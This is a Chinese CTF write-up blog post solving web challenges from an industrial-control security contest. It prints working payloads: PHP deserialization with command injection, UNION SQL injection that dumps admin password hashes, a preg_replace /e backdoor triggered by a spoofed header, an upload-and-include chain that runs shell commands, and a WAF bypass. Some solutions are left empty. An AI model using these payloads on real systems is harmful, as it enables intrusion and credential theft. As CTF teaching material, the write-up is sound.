Chybeta

赛博地球杯工业互联网安全大赛-Web-writeup

为什么比赛要办在考试周。。
一些题是比赛完后做的,暂时只写了部分题的wp。

大量设备报表不见了(签道题)

题目

1
2
云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
http://120.27.14.73:20006/

Solution

报表中心有链接,发现url为

1
http://120.27.14.73:20006/index.php?id=1

不是sql注入,尝试爆破。当id=2333时:

1
flag{2333_bao_pO_OOOO0o_o0OOO}

工控系统的敏感消息遭泄漏

题目

1
2
云平台消息中心,泄漏了不该泄漏的消息。导致系统可以被入侵。
http://47.104.99.231:20003/

Solution

存在git泄露,用githack下载源码进行审计。

index2.php中,有如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$secret = $_GET['secret'];
$ad = $_GET['ad'];
if(isset($ad)){
if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)
{
echo '<script>alert("Sorry ! Again !")</script>';
}
elseif(strpos($ad, '--') !== FALSE)
{
echo "Ok Evrything will be fine!<br ><br >";
if (stripos($secret, './') > 0) {
die();
}
unserialize($secret);
}
else
{
echo '<script>alert("Sorry ! You must have --")</script>';
}
}

ereg,可以用%00绕过,然后再让--出现在%00的后面,即可进入第二个分支,进行反序列操作。在进行反序列化之前,进行了判断,不允许$secret中出现./

在class.php中,定义了如下类:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class Record{
public $file="Welcome";
public function __construct($file)
{
$this->file = $file;
}
public function __sleep()
{
$this->file = 'sleep.txt';
return array('file');
}
public function __wakeup()
{
$this->file = 'wakeup.txt';
}
public function __destruct()
{
if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {
system("php ./import/$this->file.php");
}else{
echo "<?php Something destroyed ?>";
}
}
}

__destruct阶段,进行了system操作,但在反序列化时__wakeup方法的调用会设置file为wakeup.txt,CVE-2016-7124中提到可以如果被反序列话的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得__wakeup失效。因此可以绕过,也即file字段可控,且没有过滤。

由前分析,由于不允许出现./,我们考虑先获得绝对路径。

在class.php中,将sleep方法注释掉,在尾部添加

1
2
3
$b =new Record('Flag.php && pwd && pwd && cat waf');
$c = serialize($b);
echo $c;

这样在执行时即执行:

1
system("php ./import/Flag.php && pwd && pwd && cat waf.php");

pwd是为了获取当前路径,之后的是因为有一个.php的后缀。得到;

1
O:6:"Record":1:{s:4:"file";s:33:"Flag.php && pwd && pwd && cat waf";}

修改为:

1
O:6:"Record":2:{s:4:"file";s:33:"Flag.php && pwd && pwd && cat waf";}

url编码后访问:

1
http://47.104.99.231:20003/index2.php?ad=1%00--&secret=O%3A6%3A%22Record%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A33%3A%22Flag.php%20%26%26%20pwd%20%26%26%20pwd%20%26%26%20cat%20waf%22%3B%7D

获得绝对路径为/var/www/html。

1
2
3
$b =new Record('Flag.php && pwd && cat /var/www/html/import/Flag');
$c = serialize($b);
echo $c;

得到:

1
O:6:"Record":1:{s:4:"file";s:48:"Flag.php && pwd && cat /var/www/html/import/Flag";}

修改为:

1
O:6:"Record":2:{s:4:"file";s:48:"Flag.php && pwd && cat /var/www/html/import/Flag";}

url编码,访问:

1
http://47.104.99.231:20003/index2.php?ad=1%00--&secret=O%3A6%3A%22Record%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A48%3A%22Flag.php%20%26%26%20pwd%20%26%26%20cat%20%2fvar%2fwww%2fhtml%2fimport%2fFlag%22%3B%7D

flag如下:

1
flag{g_i_i_t_is_unsafe_ahhhahahah}

工控管理系统新版本

题目

1
2
云工控管理系统新添加的登录和注册页面存在漏洞,请找出flag。
http://47.104.1.173:20004/

Solution

findpwd.php有注入漏洞

1
2
3
4
POST:
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)),32#
information_schema<br>cetc004<br>mysql<br>performance_schema<br>

1
2
3
4
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x63657463303034)),32#
admin<br>user<br>
1
2
3
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e)),32#
username<br>password<br>question<br>answer<br>
1
2
3
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(username,0x20,password,0x20,question,0x20,answer)+FROM+cetc004.admin)),32#
c3tlwDmIn23 2f8667f381ff50ced6a3edc259260ba9 cetc cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds
1
2
3
4
5
6
7
8
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(username,0x20,password,0x20,question,0x20,answer+SEPARATOR+0x3c62723e)+FROM+cetc004.user)),32#
c3tlwDmIn23 2f8667f381ff50ced6a3edc259260ba9 cetc cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds<br>
1 c4ca4238a0b923820dcc509a6f75849b 1 1<br>
admin c4ca4238a0b923820dcc509a6f75849b 1 1<br>
root c81e728d9d4c2f636f067f89cc14862c 1 1<br>
' 024c94d6e03b6f67a86b952b914816c7 ' '<br>
xxoo e10adc3949ba59abbe56e057f20f883e 123456 123456

工控云管理系统设备维护中心被植入后门

题目

1
2
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统
http://47.104.74.209:20005

Solution

利用page参数和php伪协议读取源码

1
2
3
4
5
6
7
8
9
GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

得到index.php源码,其中第121行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}

这里存在后门,添加头部和对应GET字段。

1
2
3
4
5
6
7
8
9
10
GET /index.php?pat=/(.*)/e&rep=system('ls')&sub=aa HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
X-Forwarded-For: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

发现一个目录s3chahahaDir,之后还有一个目录flag,里面有flag.php

1
2
3
4
5
6
7
8
9
10
GET /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
X-Forwarded-For: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

得到flag:

1
flag{SecuriTY_Preg_eee3}

工控云管理系统客服中心期待您的反馈

题目

1
2
3
4
工控云管理系统客服中心存在漏洞,flag就在flag/flag/flag/flag/flag/flag/flag.php文件里面
http://47.104.188.226:20001
请找到这个隐藏的文件,swp?不不不。。。再找找。。

Solution

有一个上传功能:

1
http://47.104.188.226:20001/includes/upload.php

存在swn,swo,swp文件泄露:

1
2
3
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn

但实际上只有swo,可以直接看到源码:view-source:http://47.104.188.226:20001/.index.php.swo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php
error_reporting(0);
ini_set('open_basedir', '/var/www/html');
function autoload($page) {
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
die('no flag flag flag flag !');
}
if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
die('no uploaded uploaded uploaded uploaded !');
}
if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
die('no ://f ://f ://f');
}
if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
die('no ata ata ata');
}
if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
die('no 0 0 0');
}
if(file_exists("./includes/$page.php")) {
include "./includes/$page.php";
}
elseif(file_exists("./includes/$page")) {
include "./includes/$page";
}else{
echo "File is not exit ";
}
}
function download($adfile, $file){
//Only Administrators can download files .
$cert = 'N';
if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
echo "Welcome ! You Are Administrator !";
$cert = 'Y';
}else{
echo "error1";
}
if ($cert === 'Y'){
if (stripos($file, 'file_list') != false) die('error4');
if (stripos($file, 'file_list') >= 0) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='. basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
}else{
die('error2');
}
}else{
echo 'error3';
}
}
if(!isset($_GET['page'])) {
$page = 'index';
}
else {
$page = $_GET['page'];
}
if (stripos($page, './') > 0) {
die('no ./ ./ ./ ./');
}
if (stripos($page, '://') > 0) {
die('no :// :// ://');
}
autoload($page);
if (isset($_GET[admin]) && isset($_GET[file])) {
if (stripos($_GET[admin], 'flag') > 0 || stripos($_GET[file], 'flag') > 0) {
die('not flag flag flag falg !');
}
if (strlen($_GET[file]) >= 38) {
die('too long');
}
download($_GET[admin], $_GET[file]);
}
?>

上面这个是index.php的源码,分析起来两个功能:

  1. autoload功能,这里提供了一个文件包含,但需要绕过许多限制,后面再说。
  2. download功能,提供了文件下载功能。

先利用download功能。在最下面,接受了两个参数adminfile。在download函数中,对admin参数做了检测:

1
if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss')

结合题目里有上传功能,我们访问:

1
2
3
4
http://47.104.188.226:20001/index.php?admin=php://input&file=includes/upload.php
POST:
Yeah Everything Will Be Ok My Boss

从而获得了upload.php的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
<?php
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
die('no flag flag flag flag !');
}
if (!empty($_FILES)) {
//properties of the uploaded file
$name= $_FILES["filename"]["name"];
$type= $_FILES["filename"]["type"];
$size= $_FILES["filename"]["size"];
$temp= $_FILES["filename"]["tmp_name"];
$error= $_FILES["filename"]["error"];
if (strlen($name) >= 6) {
die('name is too long !');
}
if (stripos($name, './') > 0) {
die('invalid parameter');
}
if (stripos($name, 'php') > 0) {
die('invalid parameter');
}
if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
die('file can not upload ! ');
}
if ($error > 0)
die("Error uploading file! code $error.");
else
{
if($type !== "application/zip" || $size > 400)//condition for the file
{
die("Format not allowed or file size too big!");
}
else
{
if(file_exists('includes')){
move_uploaded_file($temp, "includes/uploaded/" .$name);
echo "Upload complete a!";
shell_exec('sh /var/www/html/includes/unzip.sh');
}elseif(file_exists('uploaded')){
move_uploaded_file($temp, "uploaded/" .$name);
echo "Upload complete!";
shell_exec('sh /var/www/html/includes/unzip.sh');
}
}
}
}else{
if(isset($_GET['step']) && strlen($_GET['step']) === 20) {
if (stripos($_GET['step'], 'lag') > 0) {
die('error');
}
if (stripos($_GET['step'], './') > 0) {
die('error');
}
if (stripos($_GET['step'], ' ') > 0) {
die('error');
}
if (stripos($_GET['step'], '/') > 0) {
die('error');
}
if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
$_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
die('error');
}
passthru('cat ' . 'uploaded/' . $_GET['step']);
}else{
die();
}
}
?>

接下来审计upload.php,可以看到允许上传zip文件,里面有这么一段代码:

1
2
3
4
5
6
7
8
9
if(file_exists('includes')){
move_uploaded_file($temp, "includes/uploaded/" .$name);
echo "Upload complete a!";
shell_exec('sh /var/www/html/includes/unzip.sh');
}elseif(file_exists('uploaded')){
move_uploaded_file($temp, "uploaded/" .$name);
echo "Upload complete!";
shell_exec('sh /var/www/html/includes/unzip.sh');
}

调用了unzip.sh,访问http://47.104.188.226:20001/includes/unzip.sh ,得到代码:

1
2
3
4
5
6
7
8
9
10
11
12
#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php

sh脚本会将zip包解压缩到当前目录的uploaded目录下,接着删除符合规则的三种文件和目录。最后创建index.php,并设置权限位。

综上,我们构造一个压缩包,使之解压后不被删除,同时结合index.php的page参数的文件包含功能,即可获得shell。

文件chybeta内容:

1
2
3
<?php
system('cat flag/flag/flag/flag/flag/flag/flag.php');
?>

压缩后为c.zip,在上传时抓包,将type改为application/zip。

上传成功后,会执行unzip.sh,即可解压出压缩包的内容,比如访问http://47.104.188.226:20001/includes/uploaded/chybeta

接着考虑如何包含uploaded目录下的chybeta文件。在index.php中,

1
2
3
if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
die('no uploaded uploaded uploaded uploaded !');
}

由于这里是用$_SERVER['QUERY_STRING'],并且用stripos来定位,所以当我们访问

1
http://47.104.188.226:20001/index.php?uploaded&page=uploaded/chybeta

$_SERVER['QUERY_STRING']即为uploaded&page=uploaded/chybeta,strpos的值为0,从而绕过了检测。

flag:

1
flag{CVE_SomeThing_aBout_gitLab}

YUNWAF的突破_青云

题目

1
2
3
4
5
工控云管理系统新版本,有防护了。不知道防护有没有用。
http://qcloudcetc.xctf.org.cn:8099
`
## Solution
当用户名过长时,即可绕过waf,这里a的个数为886个:

username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)),32#

result:
information_schema cetCCHqy004 mysql performance_schema

1
2
3
![](https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20180118/8.jpg?raw=true)
最后payload:

username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(username,password,question,answer+SEPARATOR+0x3c62723e)+FROM+cetCCHqy004.admin)),32#

1
2
3
4
![](https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20180118/10.jpg?raw=true)
# 请关注工控云管理系统的警告记录
## 题目

参与工控云管理系统警告记录的活动,可能奖励你一个flag
http://47.104.166.183:20008

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
## Solution
题目给了源码,在 http://47.104.166.183:20008/getflag.php
```php
<?php
if(!isset($_GET['c']) && !isset($_GET['re'])) {
show_source(__FILE__);
}
$selfdir = $_GET['dir'];
if (!isset($selfdir)) {
die();
}
$secret = '/var/www/html/hackme/' . md5("cetcrce" . $selfdir . $_SERVER['REMOTE_ADDR']);
@chdir('hackme');
@mkdir($secret);
@chdir($secret);
if (isset($_GET['c']) && strlen($_GET['c']) <= 5) {
include('waf.php');
@exec($_GET['c']);
}elseif(isset($_GET['re'])) {
@exec('/bin/rm -rf ' . $secret);
@exec('touch /var/www/html/hackme/index.php');
}
?>

相比于hitcon17的babyfirst,多了个waf.php,但不知道它的具体内容。
参考 HITCON CTF 2017-BabyFirst Revenge-writeup

用wget获取文件index.html,执行sh i*即可执行sh index.html

flag:

1
flag{J0w_ab0ut_c0mmAnd_3xcu}

工控云管理系统项目管理页面解析漏洞

题目

1
2
这个工控云管理系统的解析漏洞要靠管理员去修补。
http://47.104.156.32:20007

Solution

点进去后,点击项目管理,发现url为:

1
http://47.104.156.32:20007/index.php?page=flag.php

同时有一个view-source按钮,给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");
}else{
chdir('uploaded');
$f = fopen($filename, 'w');
fwrite($f, $con);
fclose($f);
}
}
?>
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';
$id = mysql_real_escape_string($_GET[id]);
$sql="select * from cetc007.user where id='$id'";
$result = mysql_query($sql);
$result = mysql_fetch_object($result);
} else {
$result = False;
die();
}
if(!$result)die("<br >something wae wrong ! <br>");
if($result){
echo "id: ".$result->id."</br>";
echo "name:".$result->user."</br>";
$_SESSION['admin'] = True;
}
?>

接下来这段代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");
}else{
chdir('uploaded');
$f = fopen($filename, 'w');
fwrite($f, $con);
fclose($f);
}
}
?>

参考 http://wonderkun.cc/index.html/?p=626

云工控管理系统文档中心的秘密

题目

1
2
云工控管理系统的文档中心页面,存在不易被发现的漏洞。
http://47.104.73.107:20002/

Solution

YUNWAF的突破_华为云

题目

1
2
工控云管理系统新版本,有防护了。不知道防护有没有用。
http://huaweicetc.xctf.org.cn

Solution

YUNWAF的突破_阿里

题目

1
2
工控云管理系统新版本,有防护了。不知道防护有没有用。
http://alicetc.xctf.org.cn

Solution

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:赛博地球杯工业互联网安全大赛-Web-writeup

文章作者:chybeta

发布时间:2018年01月18日 - 11:01

最后更新:2018年01月21日 - 15:01

原始链接:http://chybeta.github.io/2018/01/18/赛博地球杯工业互联网安全大赛-Web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。